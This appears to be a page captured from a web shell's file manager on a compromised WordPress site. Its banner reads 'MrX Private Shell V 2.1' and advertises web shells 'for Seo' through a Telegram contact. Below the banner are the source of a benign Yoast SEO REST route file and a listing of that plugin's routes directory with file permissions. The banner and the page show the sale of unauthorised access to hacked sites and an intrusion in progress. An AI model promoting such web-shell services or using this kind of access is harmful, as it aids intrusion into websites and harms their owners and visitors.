__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Yoast\WP\SEO\Routes;
use WP_REST_Response;
use Yoast\WP\SEO\Conditionals\Addon_Installation_Conditional;
use Yoast\WP\SEO\Main;
/**
* Supported_Features_Route class.
*/
class Supported_Features_Route implements Route_Interface {
/**
* Represents the supported features route.
*
* @var string
*/
public const SUPPORTED_FEATURES_ROUTE = '/supported-features';
/**
* Returns the conditionals based in which this loadable should be active.
*
* @return array
*/
public static function get_conditionals() {
return [
Addon_Installation_Conditional::class,
];
}
/**
* Registers routes with WordPress.
*
* @return void
*/
public function register_routes() {
$supported_features_route = [
'methods' => 'GET',
'callback' => [ $this, 'get_supported_features' ],
'permission_callback' => '__return_true',
];
\register_rest_route( Main::API_V1_NAMESPACE, self::SUPPORTED_FEATURES_ROUTE, $supported_features_route );
}
/**
* Returns a list of features supported by this yoast seo installation.
*
* @return WP_REST_Response a list of features supported by this yoast seo installation.
*/
public function get_supported_features() {
return new WP_REST_Response(
[
'addon-installation' => 1,
]
);
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| abstract-action-route.php | File | 634 B | 0775 |
|
| abstract-indexation-route.php | File | 900 B | 0775 |
|
| alert-dismissal-route.php | File | 2.33 KB | 0775 |
|
| first-time-configuration-route.php | File | 8.06 KB | 0775 |
|
| importing-route.php | File | 4.07 KB | 0775 |
|
| indexables-head-route.php | File | 2.39 KB | 0775 |
|
| indexing-route.php | File | 12.33 KB | 0775 |
|
| integrations-route.php | File | 2.19 KB | 0775 |
|
| meta-search-route.php | File | 1.95 KB | 0775 |
|
| route-interface.php | File | 267 B | 0775 |
|
| semrush-route.php | File | 6.26 KB | 0775 |
|
| supported-features-route.php | File | 1.28 KB | 0775 |
|
| wincher-route.php | File | 8.75 KB | 0775 |
|
| workouts-route.php | File | 3.1 KB | 0775 |
|
| yoast-head-rest-field.php | File | 5.79 KB | 0775 |
|